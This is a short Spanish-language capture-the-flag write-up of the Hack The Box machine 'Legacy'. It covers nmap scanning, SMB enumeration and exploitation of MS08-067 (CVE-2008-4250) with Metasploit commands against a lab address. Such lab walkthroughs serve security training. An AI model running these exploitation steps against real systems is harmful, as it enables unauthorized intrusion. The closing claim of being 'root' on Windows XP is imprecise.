Legacy

✍️ Autor: ch4p 🔍 Dificultad: Fácil 📅 Fecha de creación: 10/10/2017

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.10.4

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sC -sV 10.10.10.4

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo se identificaron los siguientes puertos abiertos:

  • Puerto 135 (MS RPC): Este puerto es utilizado para la comunicación de servicios como DCOM y MSRPC. Puede ser vulnerable a exploits si no está debidamente asegurado. Puedes buscar si hay alguna versión vulnerable de MSRPC, como las que se vieron con ataques como MS08-067.

  • Puerto 139 y 445 (SMB): Ambos puertos están asociados a servicios de compartición de archivos y recursos en redes Windows. Los vectores de ataque conocidos incluyen ataques de SMB Relay y exploits como EternalBlue (CVE-2017-0144). Es recomendable realizar un escaneo de vulnerabilidades para verificar si estos puertos son accesibles desde fuera y si están expuestos a vulnerabilidades conocidas.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p135,139,445 -v 10.10.10.4

para que nos proporcione más información sobre esos puertos específicamente.

Miramos el protocolo SMB.

smbmap -H 10.10.10.4

No vemos nada. Revisamos si tiene un CVE.

🚀 EXPLOTACIÓN

Al ser un Windows XP y revisando por internet encontramos que hay un CVE-2008-4250 por lo que abrimos Metasploit para explotarlo.

search CVE-2008-4250
use 0
show options
set RHOSTS 10.10.10.4
set LHOST 10.10.14.7

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

getuid

Somos root.

Last updated

Was this helpful?